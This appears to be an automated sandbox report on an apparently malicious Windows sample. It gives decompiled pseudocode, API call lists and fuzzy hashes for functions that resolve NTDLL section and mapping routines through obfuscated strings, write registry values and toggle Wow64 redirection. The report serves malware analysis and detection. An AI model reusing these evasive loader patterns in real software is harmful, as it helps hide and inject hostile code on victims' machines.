Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: b5e622a9859814e913885f0b6e80de20d6e737f0fbed8391546a49fd7e9a84a2
Instruction ID: cecbc5d0dc6bfccb87e1f554b64c22a47ea8b64c73ccafbe8e6d12b799201c37
Opcode Fuzzy Hash: b5e622a9859814e913885f0b6e80de20d6e737f0fbed8391546a49fd7e9a84a2
Instruction Fuzzy Hash: 3A5176B1B14208EAE710EBB9AE85D5F76ADEB4CB007244925E417D7144E6B5FD03AB20

Uniqueness

Uniqueness Score: -1.00%

Function 04F69488, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E04F69488(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4f6d230; // 0xf0a5a8
				_t1 = _t9 + 0x4f6e61b; // 0x253d7325
				_t36 = 0;
				_t28 = E04F663D8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x5e79631
					_t41 = E04F62CDB(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04F68E18(_t34, _t41, _a8);
						E04F61D77(_t41);
						_t42 = E04F613BD(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04F61D77(_t36);
							_t36 = _t42;
						}
						_t43 = E04F62052(_t36, _t33);
						if(_t43 != 0) {
							E04F61D77(_t36);
							_t36 = _t43;
						}
					}
					E04F61D77(_t28);
				}
				return _t36;
			}

0x04f69488
0x04f6948b
0x04f6948c
0x04f69494
0x04f6949b
0x04f694a2
0x04f694a6
0x04f694ac
0x04f694b3
0x04f694b8
0x04f694c0
0x04f694ca
0x04f694ce
0x04f694d2
0x04f694d8
0x04f694dd
0x04f694ed
0x04f694ef
0x04f69506
0x04f6950a
0x04f6950d
0x04f69512
0x04f69512
0x04f6951b
0x04f6951f
0x04f69522
0x04f69527
0x04f69527
0x04f6951f
0x04f6952a
0x04f6952a
0x04f69535

APIs

Part of subcall function 04F663D8: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F694A2,253D7325,00000000,00000000,00000000,?,00000000,04F623DE), ref: 04F6643F
Part of subcall function 04F663D8: sprintf.NTDLL ref: 04F66460

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694B3
lstrlen.KERNEL32(00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694BB

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

strcpy.NTDLL ref: 04F694D2
lstrcat.KERNEL32(00000000,00000000), ref: 04F694DD

Part of subcall function 04F68E18: lstrlen.KERNEL32(00000000,00000000,04F623DE,04F623DE,00000001,00000000,00000000,?,04F694EC,00000000,04F623DE,?,00000000,04F623DE,00000000,05E79630), ref: 04F68E2F

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04F623DE,?,00000000,04F623DE,00000000,05E79630), ref: 04F694FA

Part of subcall function 04F613BD: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04F69506,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F613C7
Part of subcall function 04F613BD: _snprintf.NTDLL ref: 04F61425

Strings

=, xrefs: 04F694F4

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 6f05cb6b32e5c77b9aad81b4fa3f36ee0510aca9192cee9e045ae86a96964eaa
Instruction ID: cf6ba772ec629ac422d37670ad3e00f2b2b97581491445d5b1271bb797fb292e
Opcode Fuzzy Hash: 6f05cb6b32e5c77b9aad81b4fa3f36ee0510aca9192cee9e045ae86a96964eaa
Instruction Fuzzy Hash: 51118273A01529B797127BB8AD84C7F3A9DDE4666C3050115F946A7200DF78FD0397E1

Uniqueness

Uniqueness Score: -1.00%

Function 04F68921, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 04F6897D
SysAllocString.OLEAUT32(0070006F), ref: 04F68991
SysAllocString.OLEAUT32(00000000), ref: 04F689A3
SysFreeString.OLEAUT32(00000000), ref: 04F68A07
SysFreeString.OLEAUT32(00000000), ref: 04F68A16
SysFreeString.OLEAUT32(00000000), ref: 04F68A21

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8751cdcee8f2c230a0d8f660ba004e0269ef588dd49a2192f6f5fcca96a2b2c5
Instruction ID: f19d5b196f916dbc1f81d6e2b4b5e5b054f76ee2f2add1acda163e1d0c9a3895
Opcode Fuzzy Hash: 8751cdcee8f2c230a0d8f660ba004e0269ef588dd49a2192f6f5fcca96a2b2c5
Instruction Fuzzy Hash: 6E315C32D00609ABDB01EFA8D944A9FB7BAEF49340F144429ED11EB110DB75A906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04F685A9, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F685A9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04F62CDB(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4f6d230; // 0xf0a5a8
					_t1 = _t23 + 0x4f6e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4f6d230; // 0xf0a5a8
					_t2 = _t26 + 0x4f6e787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04F61D77(_t54);
					} else {
						_t30 =  *0x4f6d230; // 0xf0a5a8
						_t5 = _t30 + 0x4f6e774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4f6d230; // 0xf0a5a8
							_t7 = _t33 + 0x4f6e797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4f6d230; // 0xf0a5a8
								_t9 = _t36 + 0x4f6e756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4f6d230; // 0xf0a5a8
									_t11 = _t39 + 0x4f6e7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04F65BDA(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x04f685b8
0x04f685bc
0x04f6867e
0x04f685c2
0x04f685c2
0x04f685c7
0x04f685da
0x04f685dc
0x04f685e1
0x04f685e9
0x04f685f0
0x04f685f4
0x04f685f7
0x04f68676
0x04f68677
0x04f685f9
0x04f685f9
0x04f685fe
0x04f68606
0x04f6860a
0x04f6860d
0x00000000
0x04f6860f
0x04f6860f
0x04f68614
0x04f6861c
0x04f68620
0x04f68623
0x00000000
0x04f68625
0x04f68625
0x04f6862a
0x04f68632
0x04f68636
0x04f68639
0x00000000
0x04f6863b
0x04f6863b
0x04f68640
0x04f68648
0x04f6864c
0x04f6864f
0x00000000
0x04f68651
0x04f68657
0x04f6865c
0x04f68663
0x04f6866a
0x04f6866d
0x00000000
0x04f6866f
0x04f68672
0x04f68672
0x04f6866d
0x04f6864f
0x04f68639
0x04f68623
0x04f6860d
0x04f685f7
0x04f6868c

APIs

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04F660BB,?,?,?,?,00000000,00000000), ref: 04F685CE
GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F685F0
GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F68606
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F6861C
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F68632
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F68648

Part of subcall function 04F65BDA: memset.NTDLL ref: 04F65C59

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 944696b9c1eca4d7ae0c3d1c2f8de2b5e139d97028a70929853603ebe6413653
Instruction ID: 2120fcea54b269790f0631540efe823c0fec022143b0c7055502d780d6eaba51
Opcode Fuzzy Hash: 944696b9c1eca4d7ae0c3d1c2f8de2b5e139d97028a70929853603ebe6413653
Instruction Fuzzy Hash: 05213BB260120AEFE710EF69D984E5A77ECEB04384B058969E51AD7211E735FD06CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 04F69834, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04F69834(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __edi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				intOrPtr* _t102;
				int _t103;
				signed int* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t103 = _a16;
				if(_t103 == 0) {
					__imp__( &_v284,  *0x4f6d2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E04F620EA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t102 = _a24;
					if(E04F662A4(_t97, _t102, _t96, _t60) != 0) {
						L27:
						E04F61D77(_a8);
						goto L29;
					}
					_t65 =  *0x4f6d230; // 0xf0a5a8
					_t16 = _t65 + 0x4f6e90f; // 0x65696c43
					_t68 = E04F620EA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t102 + 0x14; // 0x102
						_t33 = _t102 + 0x10; // 0x3d04f6c0
						if(E04F63CBC( *_t33, _t96, _a8,  *0x4f6d2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4f6d230; // 0xf0a5a8
							if(_t103 == 0) {
								_t35 = _t72 + 0x4f6ea05; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4f6ea00; // 0x55434b48
								_t73 = _t34;
							}
							if(E04F669C6( &_a24, _t73,  *0x4f6d2e4,  *0x4f6d2e8,  &_a24,  &_a16) == 0) {
								if(_t103 == 0) {
									_t75 =  *0x4f6d230; // 0xf0a5a8
									_t44 = _t75 + 0x4f6e889; // 0x74666f53
									_t78 = E04F620EA(0, _t44);
									_t104 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t102 + 0x10; // 0x3d04f6c0
										E04F66261( *_t47, _t96, _a8,  *0x4f6d2e8, _a24);
										_t49 = _t102 + 0x10; // 0x3d04f6c0
										E04F66261( *_t49, _t96, _t104,  *0x4f6d2e0, _a16);
										E04F61D77(_t104);
									}
								} else {
									_t40 = _t102 + 0x10; // 0x3d04f6c0
									E04F66261( *_t40, _t96, _a8,  *0x4f6d2e8, _a24);
									_t43 = _t102 + 0x10; // 0x3d04f6c0
									E04F66261( *_t43, _t96, _a8,  *0x4f6d2e0, _a16);
								}
								if( *_t102 != 0) {
									E04F61D77(_a24);
								} else {
									 *_t102 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t102 + 0x10; // 0x3d04f6c0
					if(E04F61D8C( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t105 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t105 =  *_t105 & 0x00000000;
							_t26 = _t102 + 0x10; // 0x3d04f6c0
							E04F63CBC( *_t26, _t96, _a8, _a24, _t105);
						}
						E04F61D77(_t105);
						_t103 = _a16;
					}
					E04F61D77(_a24);
					goto L14;
				}
				if(_t103 <= 8 || _t103 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t103);
					__imp__(_t106 + _t103 - 0x117,  *0x4f6d2ec);
					 *((char*)(_t106 + _t103 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x04f69834
0x04f6983d
0x04f69843
0x04f69849
0x04f698b8
0x04f698be
0x04f698c3
0x04f698cc
0x04f698d3
0x04f698d6
0x04f69a4a
0x04f69a51
0x04f69a51
0x04f69a56
0x04f69a58
0x04f69a58
0x04f69a61
0x04f69a61
0x04f698dc
0x04f698e8
0x04f69a40
0x04f69a43
0x00000000
0x04f69a43
0x04f698ee
0x04f698f3
0x04f698fc
0x04f69903
0x04f69906
0x04f69950
0x04f69950
0x04f69963
0x04f6996d
0x04f69975
0x04f6997a
0x04f69984
0x04f69984
0x04f6997c
0x04f6997c
0x04f6997c
0x04f6997c
0x04f699a6
0x04f699ae
0x04f699dc
0x04f699e1
0x04f699ea
0x04f699ef
0x04f699f3
0x04f69a25
0x04f699f5
0x04f69a02
0x04f69a05
0x04f69a15
0x04f69a18
0x04f69a1e
0x04f69a1e
0x04f699b0
0x04f699bd
0x04f699c0
0x04f699d2
0x04f699d5
0x04f699d5
0x04f69a2f
0x04f69a3b
0x04f69a31
0x04f69a34
0x04f69a34
0x04f69a2f
0x04f699a6
0x00000000
0x04f6996d
0x04f69915
0x04f6991f
0x04f69921
0x04f69926
0x04f6992a
0x04f6992c
0x04f69937
0x04f6993a
0x04f6993a
0x04f69940
0x04f69945
0x04f69945
0x04f6994b
0x00000000
0x04f6994b
0x04f6984e
0x00000000
0x04f69875
0x04f69880
0x04f69896
0x04f6989c
0x04f698a4
0x00000000
0x04f698a4

APIs

StrChrA.SHLWAPI(04F629E4,0000005F,00000000,00000000,00000104), ref: 04F69867
memcpy.NTDLL(?,04F629E4,?), ref: 04F69880
lstrcpy.KERNEL32(?), ref: 04F69896

Part of subcall function 04F620EA: lstrlen.KERNEL32(?,04F6D2E0,74E47FC0,00000000,04F68EA8,00000001,00000001,?,?,?,04F68A5F,00000001), ref: 04F620F3
Part of subcall function 04F620EA: mbstowcs.NTDLL ref: 04F6211A
Part of subcall function 04F620EA: memset.NTDLL ref: 04F6212C

Part of subcall function 04F66261: lstrlenW.KERNEL32(04F629E4,?,?,04F69A0A,3D04F6C0,80000002,04F629E4,04F63616,74666F53,4D4C4B48,04F63616,?,3D04F6C0,80000002,04F629E4,?), ref: 04F66281

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

lstrcpy.KERNEL32(?,00000000), ref: 04F698B8

Strings

\, xrefs: 04F6989C

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 16c8f8d4098c8b7d06d67ad31ad5e9b9d9daad1707ce3b14a15f86eab7488a90
Instruction ID: 54326d6ad27281b985646c00219e317195445a04bc2d50e64d682302ad271dea
Opcode Fuzzy Hash: 16c8f8d4098c8b7d06d67ad31ad5e9b9d9daad1707ce3b14a15f86eab7488a90
Instruction Fuzzy Hash: 50514A72A0010AFFEF11AFA0DD44EAA7BB9FF08304F008455F91696160E775ED66EB61

Uniqueness

Uniqueness Score: -1.00%

Function 04F61FBF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E04F61FBF(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04F68921(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x4f6d230; // 0xf0a5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x4f6e4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x4f6e924; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x4f6d0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x04f61fbf
0x04f61fc6
0x04f61fca
0x04f61fcf
0x04f61fd6
0x04f61fd9
0x04f61fe3
0x04f61fe8
0x04f61ff4
0x04f61ffb
0x04f62005
0x04f62005
0x04f61ffd
0x04f61ffd
0x04f61ffd
0x04f61ffd
0x04f6200b
0x04f6200e
0x04f62016
0x04f62019
0x04f6201c
0x04f6201f
0x04f62024
0x04f6202d
0x04f6203a
0x04f6202f
0x04f62035
0x04f62035
0x04f62040
0x04f62040
0x04f62048

APIs

Part of subcall function 04F68921: SysAllocString.OLEAUT32(?), ref: 04F6897D
Part of subcall function 04F68921: SysAllocString.OLEAUT32(0070006F), ref: 04F68991
Part of subcall function 04F68921: SysAllocString.OLEAUT32(00000000), ref: 04F689A3
Part of subcall function 04F68921: SysFreeString.OLEAUT32(00000000), ref: 04F68A07

memset.NTDLL ref: 04F61FE3
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04F6201F
GetLastError.KERNEL32 ref: 04F6202F
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04F62040

Strings

<, xrefs: 04F61FF4

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 102bed8d246e985a7f4c93b1f7d81a4d380f6c9e28b02938c541ffb7c7880637
Instruction ID: c7ea3519513514707415e7617f66150d4e9668880694062f62b663b8417c3585
Opcode Fuzzy Hash: 102bed8d246e985a7f4c93b1f7d81a4d380f6c9e28b02938c541ffb7c7880637
Instruction Fuzzy Hash: 16110075900218FBEB10EFA5D884BD97BB8FF08384F018056E916E7140D774E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F61304, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E04F61304(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4f6d2d4; // 0x5e79630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4f6d2d4; // 0x5e79630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4f6d030) {
					HeapFree( *0x4f6d1f0, 0, _t8);
				}
				_t14[1] = E04F682EB(_v0);
				_t11 =  *0x4f6d2d4; // 0x5e79630
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x04f61304
0x04f61304
0x04f6130d
0x04f6131d
0x04f6131d
0x04f61322
0x04f61327
0x00000000
0x00000000
0x04f61317
0x04f61317
0x04f61329
0x04f6132d
0x04f6133f
0x04f6133f
0x04f6134f
0x04f61352
0x04f61357
0x04f6135b
0x04f61361

APIs

RtlEnterCriticalSection.NTDLL(05E795F0), ref: 04F6130D
Sleep.KERNEL32(0000000A,?,00000001,00000000), ref: 04F61317
HeapFree.KERNEL32(00000000,00000000,?,00000001,00000000), ref: 04F6133F
RtlLeaveCriticalSection.NTDLL(05E795F0), ref: 04F6135B

Strings

Ut, xrefs: 04F6133F

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 541426f32e3edd9dc7b5606ecec1281ebbd92dac0cdaa221de7b6f8943549705
Instruction ID: d75c812a78a9c274669d6192e92cb997f52adde6a0827916fca289e8aac611b0
Opcode Fuzzy Hash: 541426f32e3edd9dc7b5606ecec1281ebbd92dac0cdaa221de7b6f8943549705
Instruction Fuzzy Hash: C3F0F271B05286EBF7209FA9FA8AF1A37A8EB04744B044404F5E7D7655C638EC12CB29

Uniqueness

Uniqueness Score: -1.00%

Function 04F615AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E04F615AF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4f6d2d4; // 0x5e79630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4f6d2d4; // 0x5e79630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4f6d2d4; // 0x5e79630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4f6e85f) {
					HeapFree( *0x4f6d1f0, 0, _t10);
					_t7 =  *0x4f6d2d4; // 0x5e79630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x04f615af
0x04f615b8
0x04f615c8
0x04f615c8
0x04f615cd
0x04f615d2
0x00000000
0x00000000
0x04f615c2
0x04f615c2
0x04f615d4
0x04f615d9
0x04f615dd
0x04f615f0
0x04f615f6
0x04f615f6
0x04f615ff
0x04f61601
0x04f61605
0x04f6160b

APIs

RtlEnterCriticalSection.NTDLL(05E795F0), ref: 04F615B8
Sleep.KERNEL32(0000000A,?,00000001,00000000), ref: 04F615C2
HeapFree.KERNEL32(00000000,?,?,00000001,00000000), ref: 04F615F0
RtlLeaveCriticalSection.NTDLL(05E795F0), ref: 04F61605

Strings

Ut, xrefs: 04F615F0

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: f09c3160aca744438c972ae3f6fb3bc0ef8fd9b56d01b58109ac63b05d18a082
Instruction ID: 2f3e65472ef2d6892056c59b2aabc0144bb53ac9e991ff70b66240b89f64ce74
Opcode Fuzzy Hash: f09c3160aca744438c972ae3f6fb3bc0ef8fd9b56d01b58109ac63b05d18a082
Instruction Fuzzy Hash: DBF0D4B5701246EFF7189F65FA49F1577B5EB08745B044008E5A7D7250DB38EC02DB21

Uniqueness

Uniqueness Score: -1.00%

Function 04F6688D, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04F6688D(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x4f6d0fc(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x4f6d1f0, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x04f66895
0x04f6689a
0x04f6689c
0x04f668a3
0x04f668b5
0x04f668b5
0x04f668b9
0x04f668bb
0x04f668be
0x04f668c1
0x04f668ca
0x04f668d4
0x04f668d8
0x04f668dd
0x04f668f3
0x04f668f7
0x04f66948
0x04f668f9
0x04f668f9
0x04f66901
0x04f66910
0x04f66915
0x04f66925
0x04f6692b
0x04f66936
0x04f66940
0x04f66944
0x04f66944
0x04f668f7
0x04f6694f
0x04f66956

APIs

lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 04F668C1
